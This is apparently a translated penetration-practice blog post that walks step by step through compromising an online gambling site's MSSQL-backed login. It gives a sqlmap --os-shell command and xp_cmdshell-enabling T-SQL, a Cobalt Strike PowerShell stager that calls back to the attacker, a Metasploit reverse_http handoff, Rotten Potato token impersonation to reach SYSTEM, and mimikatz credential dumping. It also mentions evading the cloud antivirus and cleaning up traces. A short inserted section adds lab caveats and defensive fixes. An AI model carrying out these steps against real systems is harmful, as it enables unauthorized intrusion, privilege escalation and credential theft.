Penetration practice - sqlserver empowerment
2022-07-04 03:43:00 【amingMM】
Technical points:
Evading Alibaba Cloud Shield (Yundun)
Getting a Cobalt Strike / Metasploit session (beacon callback)
0x00 Precondition: initial access
Target: the login page of a BC (online gambling) site.
Running sqlmap directly against the login form finds a blind SQL injection, and --os-shell gives a command shell through the database:
sqlmap -u "http://127.0.0.1/Login/index" --form --batch --os-shell


os-shell

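What the os-shell above actually does on MSSQL is worth seeing, because it explains both why the step works at all and why the resulting shell runs as the SQL Server service account (nt service\mssqlserver, as the post observes later). The T-SQL below is an added example and not part of the original post or of sqlmap's code: it mirrors the sequence sqlmap issues through stacked queries (enable xp_cmdshell via sp_configure, then run a command), together with the check and the rollback a defender would want. It assumes the injected login is a member of sysadmin, which --os-shell needs on MSSQL; run it in a lab instance, not against a target you do not own.

```sql
-- Added example, not from the original post: the mechanism behind sqlmap --os-shell on MSSQL.
-- Assumption: the injected database login is sysadmin (otherwise sp_configure fails).

-- 1. Recon from the injection point: who am I inside SQL Server, and am I sysadmin?
--    IS_SRVROLEMEMBER returns 1 when the current login is in the role.
SELECT SUSER_SNAME()               AS login_name,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- 2. Is xp_cmdshell already enabled?  value_in_use = 1 means command execution is live.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 3. What sqlmap sends (as stacked queries) when it builds the os-shell.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- Commands run under the SQL Server service account, not the web user.
-- On a default SQL Server 2012+ install this prints the virtual account
-- nt service\mssqlserver, which is exactly the low privilege the post reports.
EXEC master..xp_cmdshell 'whoami';

-- 4. Defender side: switch it back off and confirm (expect value_in_use = 0).
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
SELECT value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell';
```

Two caveats follow from this. First, --os-shell only works on MSSQL when the injection supports stacked queries and the login is sysadmin; the real root cause on this target is a web application connecting to the database with a sysadmin account, and the fix is a least-privilege database user plus keeping xp_cmdshell disabled (auditing sp_configure changes catches the re-enable). Second, the service-account context is also why the later privilege escalation is needed: xp_cmdshell never hands out more than the service account already has.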
0x01 Getting a Cobalt Strike beacon
Cobalt Strike
● Create a listener
Generate a PowerShell command payload (a PowerShell one-liner that downloads and runs the stager)



Paste the one-liner into the os-shell command line obtained above; the beacon calls back to the listener.

● Check privileges
The current shell runs only as nt service\mssqlserver (the SQL Server service account), which is very low privilege.
0x02 Privilege escalation

● Check the installed patches
systeminfo reports 154 hotfixes installed:
Hotfix(es): 154 Hotfix(es) Installed.
[01]: KB2959936
[02]: KB3191564
[03]: KB2896496
[04]: KB2919355
[05]: KB2920189
[06]: KB2928120
[07]: KB2931358
[08]: KB2931366
[09]: KB2933826
[10]: KB2938066
[11]: KB2938772
[12]: KB2949621
[13]: KB2954879
[14]: KB2958262
[15]: KB2958263
[16]: KB2961072
[17]: KB2965500
[18]: KB2966407
[19]: KB2967917
[20]: KB2971203
[21]: KB2971850
[22]: KB2973351
[23]: KB2973448
[24]: KB2975061
[25]: KB2976627
[26]: KB2977629
[27]: KB2981580
[28]: KB2987107
[29]: KB2989647
[30]: KB2989930
[31]: KB2998527
[32]: KB3000850
[33]: KB3003057
[34]: KB3004545
[35]: KB3008242
[36]: KB3011780
[37]: KB3012702
[38]: KB3013172
[39]: KB3013410
[40]: KB3013538
[41]: KB3013769
[42]: KB3013791
[43]: KB3013816
[44]: KB3014442
[45]: KB3019978
[46]: KB3021674
[47]: KB3023266
[48]: KB3024751
[49]: KB3024755
[50]: KB3027209
[51]: KB3030947
[52]: KB3031044
[53]: KB3033446
[54]: KB3034348
[55]: KB3035126
[56]: KB3036612
[57]: KB3038002
[58]: KB3042058
[59]: KB3042085
[60]: KB3043812
[61]: KB3044374
[62]: KB3044673
[63]: KB3045634
[64]: KB3045685
[65]: KB3045717
[66]: KB3045719
[67]: KB3045755
[68]: KB3045999
[69]: KB3046017
[70]: KB3046737
[71]: KB3048043
[72]: KB3054169
[73]: KB3054203
[74]: KB3054256
[75]: KB3054464
[76]: KB3055323
[77]: KB3055343
[78]: KB3055642
[79]: KB3059317
[80]: KB3060681
[81]: KB3060793
[82]: KB3061512
[83]: KB3063843
[84]: KB3071756
[85]: KB3077715
[86]: KB3078405
[87]: KB3078676
[88]: KB3080149
[89]: KB3081320
[90]: KB3082089
[91]: KB3084135
[92]: KB3084905
[93]: KB3086255
[94]: KB3087137
[95]: KB3091297
[96]: KB3092601
[97]: KB3092627
[98]: KB3094486
[99]: KB3095701
[100]: KB3099834
[101]: KB3100473
[102]: KB3102429
[103]: KB3102939
[104]: KB3103616
[105]: KB3103696
[106]: KB3103709
[107]: KB3109103
[108]: KB3109976
[109]: KB3110329
[110]: KB3115224
[111]: KB3121261
[112]: KB3123245
[113]: KB3126041
[114]: KB3126434
[115]: KB3126587
[116]: KB3126593
[117]: KB3132080
[118]: KB3133043
[119]: KB3133690
[120]: KB3134179
[121]: KB3134815
[122]: KB3137728
[123]: KB3138602
[124]: KB3139164
[125]: KB3139398
[126]: KB3139914
[127]: KB3140219
[128]: KB3140234
[129]: KB3144850
[130]: KB3145384
[131]: KB3145432
[132]: KB3146604
[133]: KB3146723
[134]: KB3146751
[135]: KB3147071
[136]: KB3149157
[137]: KB3155784
[138]: KB3156059
[139]: KB3159398
[140]: KB3161949
[141]: KB3162343
[142]: KB3172614
[143]: KB3172729
[144]: KB3175024
[145]: KB3178539
[146]: KB3179574
[147]: KB3185319
[148]: KB4033428
[149]: KB4483187
[150]: KB4486105
[151]: KB4486107
[152]: KB5001403
[153]: KB5007154
[154]: KB5008263
Network Card(s): 1 NIC(s) Installed.
[01]: Red Hat VirtIO Ethernet Adapter
Connection Name: Ethernet
DHCP Enabled: Yes
Try MS16-075 (the Rotten Potato local NTLM reflection technique, exploit/windows/local/ms16_075_reflection in Metasploit); the corresponding update is absent from the list above.
Identify the AV from the process list
https://mrxn.net/avlist/
Result: Alibaba Cloud Shield (Aliyun Dun)
0x03 Pivoting to Metasploit
● Create a new listener (payload)
Choose the Foreign HTTP type

In msf, start a matching handler (exploit/multi/handler with windows/meterpreter/reverse_http, same host and port as the Foreign listener)

● In CS, spawn a new session

Right-click the beacon, choose Spawn, and select the Foreign listener to pass the session

Wait in msf for the session to connect (note: it seems that a session with a domain prefix cannot be spawned this way)


Privileges are still low. Use the CS file browser to upload the Rotten Potato binary (potato.exe) to the target.


● In the meterpreter session, start the escalation:
cd C:\\Users\\Public
use incognito
execute -cH -f ./potato.exe   (-c channelized I/O, -H hidden window)
list_tokens -u
Copy the elevated token name shown by list_tokens (here the administrator token)
impersonate_token "<token name copied from list_tokens>"
Note: meterpreter requires the backslash in the token name to be doubled, e.g. impersonate_token "NT AUTHORITY\\SYSTEM".

This gives SYSTEM privileges.
0x04 Dumping hashes
load mimikatz   (current Metasploit replaces this extension with kiwi; load kiwi provides the same creds_all command)
creds_all


Or use the built-in Metasploit post module: run post/windows/gather/smart_hashdump

Log in directly with the recovered credentials.
0x05 Clean up traces
